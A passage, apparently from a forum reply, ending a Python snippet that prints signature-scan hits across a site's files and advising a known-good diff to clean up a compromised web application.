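    for path, hits in sorted(scan_tree(build_demo_tree()).items()):
        for lineno, sig in hits:
            print("%s:%d: %s" % (path, lineno, sig))
```

Point `scan_tree()` at the real document root and at any writable directories outside it (upload and cache folders are the usual drop sites). A hit list is a starting point for cleanup, not proof the site is clean afterwards: the poster already counts four variants, so once the entry point is found, the reliable check is a file-by-file diff against a known-good copy of the application rather than another signature pass.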
